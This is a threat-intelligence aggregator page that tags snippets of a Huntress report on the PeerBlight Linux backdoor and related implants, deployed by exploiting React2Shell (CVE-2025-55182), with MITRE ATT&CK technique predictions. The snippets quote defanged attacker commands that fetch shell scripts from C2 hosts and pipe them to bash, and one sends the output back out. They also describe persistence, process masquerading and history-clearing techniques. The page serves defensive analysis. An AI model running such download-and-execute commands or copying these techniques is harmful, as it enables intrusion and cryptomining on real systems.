TTPwire Vol. 1 · MITRE ATT&CK·Tagged

← All stories

Huntress

PeerBlight Linux Backdoor Exploits React2Shell CVE-2025-55182

2025-12-09 · Read original ↗

ATT&CK techniques detected

42 predictions
T1543.002Systemd Service
99%
“directly from the official github releases. the miner was configured to connect to pool. hashvault [. ] pro using the monero wallet address 49pyi8efzgnfzwufxgxqj4izzjgx8trynfez9s9yshus1rnbwtkramnykkuvuabhv5w41f4pk6z7j3aufw9qfnfkeo3v1cw. the script establishes persistence via syst…”
T1543.002Systemd Service
99%
“for tracking purposes. persistence mechanisms systemd service ( root ) when running with root privileges, peerblight installs a systemd service unit that ensures the backdoor survives system reboots. the service file is written to “ / lib / systemd / system / systemd - agent. ser…”
T1070.003Clear Command History
99%
“the compromised host. the socks5 implementation handles the full protocol handshake, supporting all three address types : ipv4 addresses, fully qualified domain names, and ipv6 addresses. this capability transforms each compromised host into a network pivot point. threat actors c…”
T1105Ingress Tool Transfer
98%
“windows \ system32 \ cmd. exe / d / s / c " curl hxxp : / / 207. 148. 79 [. ] 178 : 6608 / sys. sh | bash " followed by an attempt to download the linux - based cryptocurrency miner : - c : \ \ windows \ \ system32 \ \ cmd. exe / d / s / c \ " wget hxxp : / / 216. 158. 232 [. ] 4…”
T1190Exploit Public-Facing Application
98%
“exploited by unauthenticated attackers merely by crafting one malicious http request. several research teams have since started to report exploitation in the wild. while cve - 2025 - 55182 pertains to the upstream implementation in react, you may hear of “ cve - 2025 - 66478 ” tr…”
T1543.002Systemd Service
97%
“wget ”, depending on system availability. the downloaded file is stored with a timestamped filename in “ / tmp ”. the script implements a privilege - aware installation routine that adapts its persistence mechanism based on the user context. when running as root, it copies the pa…”
T1059.004Unix Shell
97%
“c : \ windows \ system32 \ cmd. exe / d / s / c " wget hxxp : / / vps - zap812595 - 1. zap - srv [. ] com : 3000 / sex. sh & & bash sex. sh " - c : \ windows \ system32 \ cmd. exe / d / s / c " $ ( curl - s hxxp : / / help. 093214 [. ] xyz : 9731 / fn32. sh | bash | gzip - n | ba…”
T1190Exploit Public-Facing Application
96%
“peerblight linux backdoor exploits react2shell cve - 2025 - 55182 tl ; dr : huntress is seeing threat actors exploit a vulnerability in react server components ( cve - 2025 - 55182 ) across several organizations in our customer base. attackers have attempted to deploy cryptominer…”
T1190Exploit Public-Facing Application
95%
“also uncovered threat actors using a payload we call cowtunnel, which operates as a reverse proxy and initiates outbound connections to attacker - controlled frp servers. - we identified a go - based post - exploitation implant we ' ve dubbed zinfoq, which features interactive re…”
T1055.001Dynamic-link Library Injection
94%
“”, a special linux symlink that always points to the current process ' s executable, with a spoofed argv [ 0 ]. figure 16 : re - execution setup via “ / proc / self / exe ” with spoofed process name - runtime argv [ 0 ] overwrite - the function shown in screenshot below directly …”
T1036.004Masquerade Task or Service
92%
“##vozboktusmfzqj1k - ksoftirqd - softirq. service - njsr4 / softirq if the home directory is not writable, it uses “ / tmp ” instead. process masquerading on initial execution, peerblight overwrites argv [ 0 ] in memory to hide its original path ( e. g., / tmp / backdoor ) and re…”
T1543.002Systemd Service
92%
“a bash script that pulls xmrig 6. 24. 0 directly from github. the miner connects to hashvault pool ( pool. hashvault [. ] pro ) over tls on port 443 with a hardcoded monero wallet. persistence is privilege - dependent. with root access, the script installs a systemd service named…”
T1572Protocol Tunneling
87%
“protocol tunneling with support for both control and data connections. ftp requires two channels : a control channel ( port 21 ) and dynamic data channels for actual file transfers. the payload handles this with the “ remote _ data _ port ” configuration option. debug messages in…”
T1572Protocol Tunneling
87%
“machine. the binary is statically compiled against musl libc. the payload consists of two components. the first is a malicious wrapper the attackers developed called " nss ", which handles encrypted configuration parsing, runs a websocket server that masquerades as nginx, manages…”
T1573.001Symmetric Cryptography
86%
“dzpe8oposstqdkvfftvsyw = = #, which is 443 ). the encryption uses a hardcoded 16 - byte key ( 3d40fa2730b63324bd4448fe64312a73 ) which also serves as the iv, with pkcs7 padding. the # character acts as a delimiter, allowing the implant to extract the base64 - encoded string befor…”
T1572Protocol Tunneling
86%
“##nippet of the code that verifies the signature for dht config further investigating, we found the sample of peerblight dating back to july, 2025 on virustotal. cowtunnel ntpclient payload observed in case # 4 ( sha256 : 776850a1e6d6915e9bf35aa83554616129acd94e3a3f6673bd6ddaec53…”
T1572Protocol Tunneling
83%
“. error handling produces messages like “ proxy [ % s ] error : remote _ port ” or “ local _ port not found ” for misconfigurations. http proxy http proxy enables web - based tunneling with advanced traffic manipulation features. supported options include " subdomain " to registe…”
T1543.002Systemd Service
78%
“dropper " d5. sh " we observed in case # 3 with the same core functionality but with additional capabilities for updating existing infections. this version retrieves its payload from a different c2 server ( hxxp : / / help. 093214 [. ] xyz : 9731 / ff22 ). the main difference in …”
T1082System Information Discovery
78%
“/ vim > / dev / null 2 > & 1 & wait ; rm - f / tmp / vim " - c : \ windows \ system32 \ cmd. exe / d / s / c " $ ( curl - s hxxp : / / keep. camdvr [. ] org : 8000 / d5. sh | bash | gzip - n | base64 - w0 ) " interestingly enough, the attacker ran the command “ ver | | id ”, whic…”
T1572Protocol Tunneling
77%
“, ip : % s, port : % d ” on success and “ socks5 _ proxy _ connect failed, type : % d ” on failure. the message “ socks5 proxy client can ' t connect to remote server here … ” indicates when the proxy cannot reach the target destination. tcp proxy tcp proxy provides generic port …”
T1104Multi-Stage Channels
76%
“downloading directly from the c2 server, the command accepts parameters for a separate file server : upgradefileserveraddr ( ip / hostname ), upgradefileserverport ( port ), and upgradefileserverfilename ( remote filename ). this separation lets the threat actor to host updated b…”
T1543.002Systemd Service
76%
“##83c093803d11ec7c1e29d2ad530f8e95d9a729c3818c7050d ) compiled with musl libc. the backdoor implements a full - featured command - and - control framework that leverages the bittorrent dht ( distributed hash table ) network as a fallback mechanism for c2 resolution, making it res…”
T1568.002Domain Generation Algorithms
75%
“a mersenne twister pseudo - random number generator. the prng then deterministically selects words from three embedded dictionaries containing 219, 509 verbs, and 279 nouns. these words are concatenated following one of four patterns : subject - verb - noun, subject - verb, subje…”
T1090.001Internal Proxy
70%
“##nippet of the code that verifies the signature for dht config further investigating, we found the sample of peerblight dating back to july, 2025 on virustotal. cowtunnel ntpclient payload observed in case # 4 ( sha256 : 776850a1e6d6915e9bf35aa83554616129acd94e3a3f6673bd6ddaec53…”
T1070.003Clear Command History
66%
“history - r : - “ histignore = * ” prevents any commands from being recorded - “ history - c ” clears the current session ' s history buffer - “ history - r ” reloads history from the file ( now empty for the session ) - direct history file clearing : the cleanhistory function di…”
T1105Ingress Tool Transfer
64%
“cases, beginning with vulnerability probes ( echo vuln _ test _ 123456 | base64 - w 0 ) and shell code tests ( echo $ ( ( 40872 * 40785 ) ) ) to confirm command execution. the attackers then attempted to download and execute additional payloads from multiple c2 servers : - wget h…”
T1059.004Unix Shell
61%
“##9djd912as123m4ck12m - - whoami - explorerfile - - - - - - d9djd912as123m4ck12m - - / etc / passwd for commands requiring multiple arguments, “ # # ” is used as a secondary delimiter, for example : - change _ file _ time - - - - - - d9djd912as123m4ck12m - - / tmp / payload # # 2…”
T1090.002External Proxy
61%
“##s “ / bin / login ”, presenting a standard linux login prompt to whoever connects. this means threat actors need valid credentials to get shell access. figure 11 : cowtunnel ' s telnetd initialization routine additional proxy capabilities beyond the telnet server, cowtunnel sup…”
T1059.004Unix Shell
52%
“” enables daemon mode, “ - k ” kills any existing instance, “ - l ” lists running processes matching the payload ' s name, and “ - d ” enables verbose debug output. before proceeding with its main functionality, the payload checks whether another instance is already running by it…”
T1071.001Web Protocols
51%
“using hex - encoded payloads and masquerades as a legitimate macos safari browser through its user - agent string. c2 communication protocol http transport layer all c2 traffic uses standard http post requests with a user - agent string crafted to masquerade as safari on macos : …”
T1090.001Internal Proxy
48%
“##s “ / bin / login ”, presenting a standard linux login prompt to whoever connects. this means threat actors need valid credentials to get shell access. figure 11 : cowtunnel ' s telnetd initialization routine additional proxy capabilities beyond the telnet server, cowtunnel sup…”
T1136.001Local Account
48%
“. account creation the function in the screenshot below contains code to automatically create system user accounts with administrative privileges. when the function encounters a service configuration with the telnetd plugin and accompanying “ plugin _ user ” and “ plugin _ pwd ” …”
T1090.001Internal Proxy
48%
“a formatted authentication string : - { token } _ flag _ uuid ; ; ; ; ; ; { target } ; ; ; ; ; ; { token } _ flag _ uuid where : - { token } is the implant ' s unique session identifier ( 32 - char md5 hash from beacon payload ) - { target } is the callback ip : port specified in…”
T1071.001Web Protocols
45%
“include “ plugin _ user ” or “ plugin _ pwd ” fields, and the ini template generated at runtime does not populate them. in the sample we analyzed, this user creation code would not be triggered. figure 12 : snippet of cowtunnel ' s user creation code zinfoq during our investigati…”
T1008Fallback Channels
44%
“a mersenne twister pseudo - random number generator. the prng then deterministically selects words from three embedded dictionaries containing 219, 509 verbs, and 279 nouns. these words are concatenated following one of four patterns : subject - verb - noun, subject - verb, subje…”
T1059.004Unix Shell
42%
“notably, the c2 domain keep. camdvr [. ] org was also observed in case # 2, indicating this is likely the same threat actor or campaign. additionally, this case introduced a new c2 infrastructure including 103. 135. 101 [. ] 15, 31. 56. 27 [. ] 97, help. 093214 [. ] xyz and vps -…”
T1001.003Protocol or Service Impersonation
42%
“using hex - encoded payloads and masquerades as a legitimate macos safari browser through its user - agent string. c2 communication protocol http transport layer all c2 traffic uses standard http post requests with a user - agent string crafted to masquerade as safari on macos : …”
T1190Exploit Public-Facing Application
41%
“critical because $ b values are rehydrated by react, and subsequently, it must invoke our constructor. this makes $ b our execution pivot – by compelling react to hydrate a blob - like value, react is forced to execute the constructor that davidson smuggled into _ formdata. get. …”
T1105Ingress Tool Transfer
37%
“. figure 18 : snippet of state machine decryption routine breaking down the " d5. sh " dropper the dropper script ( sha256 : 3854862bb3ee623f95d91fa15b504e2bbc30e23f1a15ad7b18aedb127998c79c ) observed in case # 3 serves as the initial installation component, responsible for deplo…”
T1090.002External Proxy
37%
“a formatted authentication string : - { token } _ flag _ uuid ; ; ; ; ; ; { target } ; ; ; ; ; ; { token } _ flag _ uuid where : - { token } is the implant ' s unique session identifier ( 32 - char md5 hash from beacon payload ) - { target } is the callback ip : port specified in…”
T1055.001Dynamic-link Library Injection
35%
“. similar to peerblight ' s use of “ [ ksoftirqd ] ”, this payload also mimics kernel threads, but dynamically selects from multiple names based on the original process name length to fit within memory bounds : hardware watchdog abuse the payload opens “ / dev / misc / watchdog ”…”
T1572Protocol Tunneling
31%
“a formatted authentication string : - { token } _ flag _ uuid ; ; ; ; ; ; { target } ; ; ; ; ; ; { token } _ flag _ uuid where : - { token } is the implant ' s unique session identifier ( 32 - char md5 hash from beacon payload ) - { target } is the callback ip : port specified in…”

Summary

Huntress is seeing threat actors exploit React2Shell (CVE-2025-55182) to deploy a Linux backdoor, a reverse proxy tunnel, and a Go-based post-exploitation implant.